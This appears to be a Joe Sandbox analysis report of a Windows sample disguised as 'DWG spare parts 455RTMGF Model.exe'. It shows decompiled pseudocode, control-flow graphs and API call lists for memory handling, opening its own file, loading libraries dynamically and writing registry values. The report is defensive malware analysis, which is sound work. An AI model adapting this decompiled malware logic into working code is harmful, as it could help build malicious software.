                                                                control_flow_graph 5127 2511abc-2511acb 5128 2511ad1-2511ad5 5127->5128 5129 2511b9c-2511b9f 5127->5129 5132 2511ad7-2511ade 5128->5132 5133 2511b38-2511b41 5128->5133 5130 2511ba5-2511baf 5129->5130 5131 2511c8c-2511c90 5129->5131 5134 2511bb1-2511bbd 5130->5134 5135 2511b6c-2511b79 5130->5135 5138 2511c96-2511c9b 5131->5138 5139 2511718-251173b call 2511674 VirtualFree 5131->5139 5136 2511ae0-2511aeb 5132->5136 5137 2511b0c-2511b0e 5132->5137 5133->5132 5140 2511b43-2511b57 Sleep 5133->5140 5142 2511bf4-2511c02 5134->5142 5143 2511bbf-2511bc2 5134->5143 5135->5134 5141 2511b7b-2511b8f Sleep 5135->5141 5144 2511af4-2511b09 5136->5144 5145 2511aed-2511af2 5136->5145 5146 2511b10-2511b21 5137->5146 5147 2511b23 5137->5147 5158 2511746 5139->5158 5159 251173d-2511744 5139->5159 5140->5132 5149 2511b5d-2511b68 Sleep 5140->5149 5141->5134 5150 2511b91-2511b98 Sleep 5141->5150 5151 2511bc6-2511bca 5142->5151 5153 2511c04-2511c09 call 25114f0 5142->5153 5143->5151 5146->5147 5152 2511b26-2511b33 5146->5152 5147->5152 5149->5133 5150->5135 5155 2511c0c-2511c19 5151->5155 5156 2511bcc-2511bd2 5151->5156 5152->5130 5153->5151 5155->5156 5160 2511c1b-2511c22 call 25114f0 5155->5160 5162 2511c24-2511c2e 5156->5162 5163 2511bd4-2511bf2 call 2511530 5156->5163 5161 2511749-2511753 5158->5161 5159->5161 5160->5156 5166 2511c30-2511c58 VirtualFree 5162->5166 5167 2511c5c-2511c89 call 2511590 5162->5167
                                                                C-Code - Quality: 91%
                                                                			E02511ABC(void* __eax, void* __edi) {
				signed int __ebx;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t54;
				void _t57;
				int _t58;
				signed int _t65;
				void* _t67;
				signed int _t69;
				intOrPtr _t70;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				void* _t82;
				void _t85;
				void* _t87;
				void* _t89;

				_t48 = __eax;
				_t77 =  *(__eax - 4);
				_t65 =  *0x256a045; // 0x0
				if((_t77 & 0x00000007) != 0) {
					__eflags = _t77 & 0x00000005;
					if((_t77 & 0x00000005) != 0) {
						_pop(_t65);
						__eflags = _t77 & 0x00000003;
						if((_t77 & 0x00000003) != 0) {
							return 0xffffffff;
						} else {
							_push(_t65);
							_t67 = __eax - 0x10;
							E02511674();
							_t50 = _t67;
							_t85 =  *_t50;
							_t82 =  *(_t50 + 4);
							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
							if(_t51 == 0) {
								_t52 = _t51 | 0xffffffff;
								__eflags = _t52;
							} else {
								 *_t82 = _t85;
								 *(_t85 + 4) = _t82;
								_t52 = 0;
							}
							 *0x256c7a0 = 0;
							return _t52;
						}
					} else {
						goto L21;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L6;
							}
							Sleep(0);
							__edx = __edx;
							__ecx = __ecx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags != 0) {
								Sleep(0xa);
								__edx = __edx;
								__ecx = __ecx;
								continue;
							}
							goto L6;
						}
					}
					L6:
					_t6 = __edx + 0xc;
					 *_t6 =  *(__edx + 0xc) - 1;
					__eflags =  *_t6;
					__eax =  *(__edx + 8);
					if( *_t6 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L12:
							 *(__ebx + 0xc) = __eax;
						} else {
							__eax =  *(__edx + 0x14);
							__ecx =  *(__edx + 4);
							 *(__eax + 4) = __ecx;
							 *(__ecx + 0x14) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
								goto L12;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x256a045; // 0x0
						L21:
						__eflags = _t65;
						_t69 = _t77 & 0xfffffff0;
						_push(_t84);
						_t87 = _t48;
						if(__eflags != 0) {
							while(1) {
								_t54 = 0x100;
								asm("lock cmpxchg [0x256a710], ah");
								if(__eflags == 0) {
									goto L22;
								}
								Sleep(0);
								_t54 = 0x100;
								asm("lock cmpxchg [0x256a710], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L22;
							}
						}
						L22:
						__eflags = (_t87 - 4)[_t69] & 0x00000001;
						_t75 = (_t87 - 4)[_t69];
						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
							_t54 = _t69 + _t87;
							_t76 = _t75 & 0xfffffff0;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E025114F0(_t54);
							}
						} else {
							_t76 = _t75 | 0x00000008;
							__eflags = _t76;
							(_t87 - 4)[_t69] = _t76;
						}
						__eflags =  *(_t87 - 4) & 0x00000008;
						if(( *(_t87 - 4) & 0x00000008) != 0) {
							_t76 =  *(_t87 - 8);
							_t87 = _t87 - _t76;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E025114F0(_t87);
							}
						}
						__eflags = _t69 - 0x13fff0;
						if(_t69 == 0x13fff0) {
							__eflags =  *0x256a718 - 0x13fff0;
							if( *0x256a718 != 0x13fff0) {
								_t70 = _t87 + 0x13fff0;
								E02511590(_t54);
								 *((intOrPtr*)(_t70 - 4)) = 2;
								 *0x256a718 = 0x13fff0;
								 *0x256a714 = _t70;
								 *0x256a710 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t89 = _t87 - 0x10;
								_t57 =  *_t89;
								_t79 =  *(_t89 + 4);
								 *(_t57 + 4) = _t79;
								 *_t79 = _t57;
								 *0x256a710 = 0;
								_t58 = VirtualFree(_t89, 0, 0x8000);
								__eflags = _t58 - 1;
								asm("sbb eax, eax");
								return _t58;
							}
						} else {
							 *(_t87 - 4) = _t69 + 3;
							 *(_t87 - 8 + _t69) = _t69;
							E02511530(_t87, _t76, _t69);
							 *0x256a710 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 8) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 4);
							 *(__edx + 0x14) = __ebx;
							 *(__edx + 4) = __ecx;
							 *(__ecx + 0x14) = __edx;
							 *(__ebx + 4) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}






















                                                                0x02511abc
                                                                0x02511abc
                                                                0x02511ac5
                                                                0x02511acb
                                                                0x02511b9c
                                                                0x02511b9f
                                                                0x02511c8c
                                                                0x02511c8d
                                                                0x02511c90
                                                                0x02511c9b
                                                                0x02511718
                                                                0x02511718
                                                                0x0251171d
                                                                0x02511720
                                                                0x02511725
                                                                0x02511727
                                                                0x02511729
                                                                0x02511734
                                                                0x0251173b
                                                                0x02511746
                                                                0x02511746
                                                                0x0251173d
                                                                0x0251173d
                                                                0x0251173f
                                                                0x02511742
                                                                0x02511742
                                                                0x02511749
                                                                0x02511753
                                                                0x02511753
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x02511ad1
                                                                0x02511ad1
                                                                0x02511ad3
                                                                0x02511ad5
                                                                0x02511b38
                                                                0x02511b38
                                                                0x02511b3d
                                                                0x02511b41
                                                                0x00000000
                                                                0x00000000
                                                                0x02511b47
                                                                0x02511b4c
                                                                0x02511b4d
                                                                0x02511b4e
                                                                0x02511b53
                                                                0x02511b57
                                                                0x02511b61
                                                                0x02511b66
                                                                0x02511b67
                                                                0x00000000
                                                                0x02511b67
                                                                0x00000000
                                                                0x02511b57
                                                                0x02511b38
                                                                0x02511ad7
                                                                0x02511ad7
                                                                0x02511ad7
                                                                0x02511ad7
                                                                0x02511adb
                                                                0x02511ade
                                                                0x02511b0c
                                                                0x02511b0e
                                                                0x02511b23
                                                                0x02511b23
                                                                0x02511b10
                                                                0x02511b10
                                                                0x02511b13
                                                                0x02511b16
                                                                0x02511b19
                                                                0x02511b1c
                                                                0x02511b1e
                                                                0x02511b21
                                                                0x00000000
                                                                0x00000000
                                                                0x02511b21
                                                                0x02511b26
                                                                0x02511b28
                                                                0x02511b2a
                                                                0x02511b2d
                                                                0x02511ba5
                                                                0x02511ba8
                                                                0x02511baa
                                                                0x02511bac
                                                                0x02511bad
                                                                0x02511baf
                                                                0x02511b6c
                                                                0x02511b6c
                                                                0x02511b71
                                                                0x02511b79
                                                                0x00000000
                                                                0x00000000
                                                                0x02511b7d
                                                                0x02511b82
                                                                0x02511b87
                                                                0x02511b8f
                                                                0x02511b93
                                                                0x00000000
                                                                0x02511b93
                                                                0x00000000
                                                                0x02511b8f
                                                                0x02511b6c
                                                                0x02511bb1
                                                                0x02511bb1
                                                                0x02511bb9
                                                                0x02511bbd
                                                                0x02511bf4
                                                                0x02511bf7
                                                                0x02511bfa
                                                                0x02511bfc
                                                                0x02511c02
                                                                0x02511c04
                                                                0x02511c04
                                                                0x02511bbf
                                                                0x02511bbf
                                                                0x02511bbf
                                                                0x02511bc2
                                                                0x02511bc2
                                                                0x02511bc6
                                                                0x02511bca
                                                                0x02511c0c
                                                                0x02511c0f
                                                                0x02511c11
                                                                0x02511c13
                                                                0x02511c19
                                                                0x02511c1d
                                                                0x02511c1d
                                                                0x02511c19
                                                                0x02511bcc
                                                                0x02511bd2
                                                                0x02511c24
                                                                0x02511c2e
                                                                0x02511c5c
                                                                0x02511c62
                                                                0x02511c67
                                                                0x02511c6e
                                                                0x02511c78
                                                                0x02511c7e
                                                                0x02511c85
                                                                0x02511c89
                                                                0x02511c30
                                                                0x02511c30
                                                                0x02511c33
                                                                0x02511c35
                                                                0x02511c38
                                                                0x02511c3b
                                                                0x02511c3d
                                                                0x02511c4c
                                                                0x02511c51
                                                                0x02511c54
                                                                0x02511c58
                                                                0x02511c58
                                                                0x02511bd4
                                                                0x02511bd7
                                                                0x02511bda
                                                                0x02511be2
                                                                0x02511be7
                                                                0x02511bee
                                                                0x02511bf2
                                                                0x02511bf2
                                                                0x02511ae0
                                                                0x02511ae0
                                                                0x02511ae2
                                                                0x02511ae8
                                                                0x02511aeb
                                                                0x02511af4
                                                                0x02511af7
                                                                0x02511afa
                                                                0x02511afd
                                                                0x02511b00
                                                                0x02511b03
                                                                0x02511b06
                                                                0x02511b06
                                                                0x02511b08
                                                                0x02511b09
                                                                0x02511aed
                                                                0x02511aed
                                                                0x02511aed
                                                                0x02511aef
                                                                0x02511af1
                                                                0x02511af2
                                                                0x02511af2
                                                                0x02511aeb
                                                                0x02511ade

                                                                APIs
                                                                • Sleep.KERNEL32(00000000,?,?,00000000,02512014), ref: 02511B47
                                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02512014), ref: 02511B61
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 6e8518d756518286c69417c02e5673826ee16e31272b593fb2b32881dfc6226d
                                                                • Instruction ID: ac1b31b3ab051b9c35779463bf31cf9de2e8678b5cd28cb940c98389dec58444
                                                                • Opcode Fuzzy Hash: 6e8518d756518286c69417c02e5673826ee16e31272b593fb2b32881dfc6226d
                                                                • Instruction Fuzzy Hash: 2351EF71600A418FEB158F6CD988765BFE0BB85314F18C6EAD649CB382E7B0D845CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025135DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5199 25135dc-25135f1 5200 25135f3-25135f6 5199->5200 5201 2513608-2513623 5199->5201 5202 25135fc-2513601 5200->5202 5203 251369e-25136a3 5200->5203 5204 2513685-251368f 5201->5204 5205 2513625-2513644 5201->5205 5202->5201 5216 2513603 call 2512d48 5202->5216 5208 25136b0 call 2512d48 5203->5208 5206 2513691-2513693 5204->5206 5207 2513695 5204->5207 5209 2513667-2513677 CreateFileA 5205->5209 5210 2513646-251364c 5205->5210 5211 2513697-251369c GetStdHandle 5206->5211 5207->5211 5217 25136b5-25136b8 5208->5217 5215 251367c-251367f 5209->5215 5210->5209 5214 251364e-251365a 5210->5214 5211->5215 5214->5209 5218 251365c-2513661 5214->5218 5219 2513681-2513683 5215->5219 5220 25136a5-25136ab GetLastError 5215->5220 5216->5201 5218->5209 5219->5217 5220->5208
                                                                C-Code - Quality: 72%
                                                                			E025135DC(void** __eax, void* __ecx, void* __edx) {
				void* _t15;
				long _t16;
				long _t18;
				void** _t22;
				long _t24;
				signed int _t29;
				long _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t37 = __edx;
				_t33 = __ecx;
				_t22 = __eax;
				if(0xffffffffffff2850 == 0) {
					L4:
					_t22[1] = 0xd7b3;
					_t22[2] = _t37;
					_t22[9] = E025135B4;
					_t22[7] = E025130E4;
					if(_t22[0x12] == 0) {
						_t22[9] = E025130E4;
						if(_t33 == 3) {
							_t15 = GetStdHandle(0xfffffff5);
						} else {
							_t15 = GetStdHandle(0xfffffff6);
						}
					} else {
						_t18 = 0xc0000000;
						_t29 =  *0x252d00c; // 0x0
						_t32 =  *(((_t29 & 0x00000070) >> 2) + 0x252d758);
						_t24 = 2;
						_t34 = _t33 - 3;
						if(_t34 != 0) {
							_t24 = 3;
							_t35 = _t34 + 1;
							if(_t35 != 0) {
								_t18 = 0x40000000;
								_t22[1] = 0xd7b2;
								if(_t35 + 1 != 0) {
									_t18 = 0x80000000;
									_t22[1] = 0xd7b1;
								}
							}
						}
						_t11 =  &(_t22[0x12]); // 0x256d940
						_t15 = CreateFileA(_t11, _t18, _t32, 0, _t24, 0x80, 0); // executed
					}
					if(_t15 == 0xffffffff) {
						_t22[1] = 0xd7b0;
						_t16 = GetLastError();
						L18:
						return E02512D48(_t16);
					} else {
						 *_t22 = _t15;
						return _t15;
					}
				}
				if(0xffffffffffff2850 > 3) {
					_t16 = 0x66;
					goto L18;
				}
				if( *((intOrPtr*)(__eax + 0x24))() != 0) {
					E02512D48(_t20);
				}
				goto L4;
			}














                                                                0x025135df
                                                                0x025135e1
                                                                0x025135e5
                                                                0x025135f1
                                                                0x02513608
                                                                0x02513608
                                                                0x0251360e
                                                                0x02513611
                                                                0x02513618
                                                                0x02513623
                                                                0x02513685
                                                                0x0251368f
                                                                0x02513697
                                                                0x02513691
                                                                0x02513697
                                                                0x02513697
                                                                0x02513625
                                                                0x02513625
                                                                0x0251362a
                                                                0x02513636
                                                                0x0251363c
                                                                0x02513641
                                                                0x02513644
                                                                0x02513646
                                                                0x0251364b
                                                                0x0251364c
                                                                0x0251364e
                                                                0x02513654
                                                                0x0251365a
                                                                0x0251365c
                                                                0x02513661
                                                                0x02513661
                                                                0x0251365a
                                                                0x0251364c
                                                                0x02513673
                                                                0x02513677
                                                                0x02513677
                                                                0x0251367f
                                                                0x025136a5
                                                                0x025136ab
                                                                0x025136b0
                                                                0x00000000
                                                                0x02513681
                                                                0x02513681
                                                                0x00000000
                                                                0x02513681
                                                                0x0251367f
                                                                0x025135f6
                                                                0x0251369e
                                                                0x00000000
                                                                0x0251369e
                                                                0x02513601
                                                                0x02513603
                                                                0x02513603
                                                                0x00000000

                                                                APIs
                                                                • CreateFileA.KERNEL32(C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe,C0000000,?,00000000,00000002,00000080,00000000,?,?,?,025136D5,02526CE7,ScanBuffer,0252AD5C,OpenSession,0252AD5C), ref: 02513677
                                                                • GetStdHandle.KERNEL32(000000F5,?,?,?,025136D5,02526CE7,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString), ref: 02513697
                                                                • GetLastError.KERNEL32(000000F5,?,?,?,025136D5,02526CE7,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString), ref: 025136AB
                                                                Strings
                                                                • C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe, xrefs: 02513676
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorFileHandleLast
                                                                • String ID: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                                • API String ID: 1572049330-1835102459
                                                                • Opcode ID: 2350a4bbf1ab361630e19b289d25203fcba38d35c3f400c515714f14612e5975
                                                                • Instruction ID: b9597b954893bc0a1f332a745c1bd97134715c4c19c3e526ac83c219c859c7c9
                                                                • Opcode Fuzzy Hash: 2350a4bbf1ab361630e19b289d25203fcba38d35c3f400c515714f14612e5975
                                                                • Instruction Fuzzy Hash: F911E7A1200201BAFB24DF1CC998766BE95BF85258F28C3D6D6088F3A9EA35C844C75D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02522A48 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                C-Code - Quality: 84%
                                                                			E02522A48(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t29;
				void* _t51;
				void* _t65;
				void* _t66;
				intOrPtr _t70;
				intOrPtr _t72;
				char _t73;
				intOrPtr _t77;
				void* _t89;
				void* _t91;
				void* _t92;
				intOrPtr _t93;

				_t73 = __edx;
				_t66 = __ecx;
				_t91 = _t92;
				_t93 = _t92 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t93 = _t93 + 0xfffffff0;
					_t29 = E02513EA8(_t29, _t91);
				}
				_t89 = _t66;
				_v5 = _t73;
				_t65 = _t29;
				_t87 = _a8;
				_push(_t91);
				_push(0x2522b90);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93;
				if(_a8 != 0xffff) {
					E02522940(E02518010(_t89, _t87 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t65 + 4)) < 0) {
						E02518218(_t89,  &_v36);
						_v24 = _v36;
						_v20 = 0xb;
						E0251A984(GetLastError(),  &_v40);
						_v16 = _v40;
						_v12 = 0xb;
						_t70 =  *0x2569c04; // 0x251ff20
						E0251B290(_t65, _t70, 1, _t87, _t89, 1,  &_v24);
						E0251425C();
					}
				} else {
					_t51 = CreateFileA(E02514D64(_t89), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
					E02522940(_t51, 0);
					if( *((intOrPtr*)(_t65 + 4)) < 0) {
						E02518218(_t89,  &_v28);
						_v24 = _v28;
						_v20 = 0xb;
						E0251A984(GetLastError(),  &_v32);
						_v16 = _v32;
						_v12 = 0xb;
						_t72 =  *0x2569de0; // 0x251ff18
						E0251B290(_t65, _t72, 1, _t87, _t89, 1,  &_v24);
						E0251425C();
					}
				}
				_t27 = _t65 + 8; // 0x2520830
				E025148F4(_t27, _t89);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_push(E02522B97);
				return E025148C4( &_v40, 4);
			}
























                                                                0x02522a48
                                                                0x02522a48
                                                                0x02522a49
                                                                0x02522a4b
                                                                0x02522a53
                                                                0x02522a56
                                                                0x02522a59
                                                                0x02522a5c
                                                                0x02522a61
                                                                0x02522a63
                                                                0x02522a66
                                                                0x02522a66
                                                                0x02522a6b
                                                                0x02522a6d
                                                                0x02522a70
                                                                0x02522a72
                                                                0x02522a77
                                                                0x02522a78
                                                                0x02522a7d
                                                                0x02522a80
                                                                0x02522a88
                                                                0x02522b18
                                                                0x02522b21
                                                                0x02522b28
                                                                0x02522b30
                                                                0x02522b33
                                                                0x02522b3f
                                                                0x02522b47
                                                                0x02522b4a
                                                                0x02522b54
                                                                0x02522b61
                                                                0x02522b66
                                                                0x02522b66
                                                                0x02522a8a
                                                                0x02522aa4
                                                                0x02522aaf
                                                                0x02522ab8
                                                                0x02522ac3
                                                                0x02522acb
                                                                0x02522ace
                                                                0x02522ada
                                                                0x02522ae2
                                                                0x02522ae5
                                                                0x02522aef
                                                                0x02522afc
                                                                0x02522b01
                                                                0x02522b01
                                                                0x02522ab8
                                                                0x02522b6b
                                                                0x02522b70
                                                                0x02522b77
                                                                0x02522b7a
                                                                0x02522b7d
                                                                0x02522b8f

                                                                APIs
                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02522B90,?,?,02520828,00000001), ref: 02522AA4
                                                                • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02522B90,?,?,02520828,00000001), ref: 02522AD2
                                                                  • Part of subcall function 02518010: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02520828,02522B12,00000000,02522B90,?,?,02520828), ref: 0251805E
                                                                  • Part of subcall function 02518218: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02520828,02522B2D,00000000,02522B90,?,?,02520828,00000001), ref: 02518237
                                                                • GetLastError.KERNEL32(00000000,02522B90,?,?,02520828,00000001), ref: 02522B37
                                                                  • Part of subcall function 0251A984: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0251C56D,00000000,0251C5C7), ref: 0251A9A3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                • String ID:
                                                                • API String ID: 503785936-0
                                                                • Opcode ID: f69e0269e5e197c0885c38396cc836421caece2097316076ca84f6c9ee38b272
                                                                • Instruction ID: 4d4ee7f92ad45908bfffaef58f880171bf3b363e5c77a07817e727a7ad622e3a
                                                                • Opcode Fuzzy Hash: f69e0269e5e197c0885c38396cc836421caece2097316076ca84f6c9ee38b272
                                                                • Instruction Fuzzy Hash: 8D316474A006199BEB10DFA8C880BEEBBF6BF89710F508565D904E72C0D7755948CFA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025236CC Relevance: 4.6, APIs: 3, Instructions: 62libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5259 25236cc-2523722 call 2514d54 * 2 call 2514d64 call 2514a98 call 251cab0 5270 2523777-2523791 call 25148c4 5259->5270 5271 2523724-2523736 GetModuleHandleA 5259->5271 5272 2523738-2523759 call 2514d64 GetProcAddress 5271->5272 5273 252376c-2523772 FreeLibrary 5271->5273 5279 252375b 5272->5279 5280 252375d-2523767 call 25236a0 5272->5280 5273->5270 5279->5280 5280->5273
                                                                C-Code - Quality: 77%
                                                                			E025236CC(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _t21;
				struct HINSTANCE__* _t26;
				CHAR* _t29;
				struct HINSTANCE__* _t30;
				_Unknown_base(*)()* _t31;
				intOrPtr _t43;
				CHAR* _t47;
				void* _t50;

				_v16 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E02514D54(_v8);
				E02514D54(_v12);
				_push(_t50);
				_push(0x2523792);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				_t47 = E02514D64(_v8);
				E02514A98( &_v16, _t47);
				_t21 = _v16;
				E0251CAB0(_t21, 0, 0x8000); // executed
				if(_t21 != 0) {
					 *0x256d2f8 = GetModuleHandleA(_t47);
					if( *0x256d2f8 != 0) {
						_t29 = E02514D64(_v12);
						_t30 =  *0x256d2f8; // 0x77cd0000
						_t31 = GetProcAddress(_t30, _t29); // executed
						 *0x256d2fc = _t31;
						if( *0x256d2fc != 0) {
						}
						E025236A0(0x2516a10);
					}
					_t26 =  *0x256d2f8; // 0x77cd0000
					FreeLibrary(_t26); // executed
				}
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(E02523799);
				return E025148C4( &_v16, 3);
			}














                                                                0x025236d6
                                                                0x025236d9
                                                                0x025236dc
                                                                0x025236e2
                                                                0x025236ea
                                                                0x025236f1
                                                                0x025236f2
                                                                0x025236f7
                                                                0x025236fa
                                                                0x02523707
                                                                0x0252370e
                                                                0x02523713
                                                                0x0252371b
                                                                0x02523722
                                                                0x0252372a
                                                                0x02523736
                                                                0x0252373c
                                                                0x02523742
                                                                0x02523748
                                                                0x0252374d
                                                                0x02523759
                                                                0x02523759
                                                                0x02523767
                                                                0x02523767
                                                                0x0252376c
                                                                0x02523772
                                                                0x02523772
                                                                0x02523779
                                                                0x0252377c
                                                                0x0252377f
                                                                0x02523791

                                                                APIs
                                                                  • Part of subcall function 0251CAB0: SetErrorMode.KERNEL32 ref: 0251CABA
                                                                  • Part of subcall function 0251CAB0: LoadLibraryA.KERNEL32(00000000,00000000,0251CB04,?,00000000,0251CB22), ref: 0251CAE9
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,02523792), ref: 02523725
                                                                • GetProcAddress.KERNEL32(77CD0000,00000000), ref: 02523748
                                                                • FreeLibrary.KERNEL32(77CD0000,00000000,00000000,02523792), ref: 02523772
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$AddressErrorFreeHandleLoadModeModuleProc
                                                                • String ID:
                                                                • API String ID: 2211333376-0
                                                                • Opcode ID: 8bdb3600d43d85e268862af31ceb3b30f30a7643fd2c44090020c7ec005d0c84
                                                                • Instruction ID: 23439601bc95cef1816198cb30c9163ad26ab69f6118bab9bbb850d7f40f9499
                                                                • Opcode Fuzzy Hash: 8bdb3600d43d85e268862af31ceb3b30f30a7643fd2c44090020c7ec005d0c84
                                                                • Instruction Fuzzy Hash: 7D1142B0A41115AFEB04EF69D884A9EB7B9FB85700F5149B5E424D3390DB34DA44DF1C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02525CC8 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                C-Code - Quality: 71%
                                                                			E02525CC8(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, int _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _t27;
				char* _t29;
				void* _t43;
				intOrPtr _t49;
				void* _t53;

				_v12 = __ecx;
				_v8 = __edx;
				_t43 = __eax;
				E02514D54(_v8);
				E02514D54(_v12);
				E02514D54(_a4);
				_push(_t53);
				_push(0x2525d6a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t53 + 0xfffffff4;
				RegOpenKeyA(_t43, E02514D64(_v8),  &_v16); // executed
				_t27 = _a4;
				if(_t27 != 0) {
					_t27 =  *(_t27 - 4);
				}
				_t29 = E02514DBC( &_a4);
				RegSetValueExA(_v16, E02514D64(_v12), 0, 1, _t29, _t27); // executed
				RegCloseKey(_v16);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E02525D71);
				E025148C4( &_v12, 2);
				return E025148A0( &_a4);
			}











                                                                0x02525ccf
                                                                0x02525cd2
                                                                0x02525cd5
                                                                0x02525cda
                                                                0x02525ce2
                                                                0x02525cea
                                                                0x02525cf1
                                                                0x02525cf2
                                                                0x02525cf7
                                                                0x02525cfa
                                                                0x02525d0b
                                                                0x02525d10
                                                                0x02525d15
                                                                0x02525d1a
                                                                0x02525d1a
                                                                0x02525d22
                                                                0x02525d39
                                                                0x02525d42
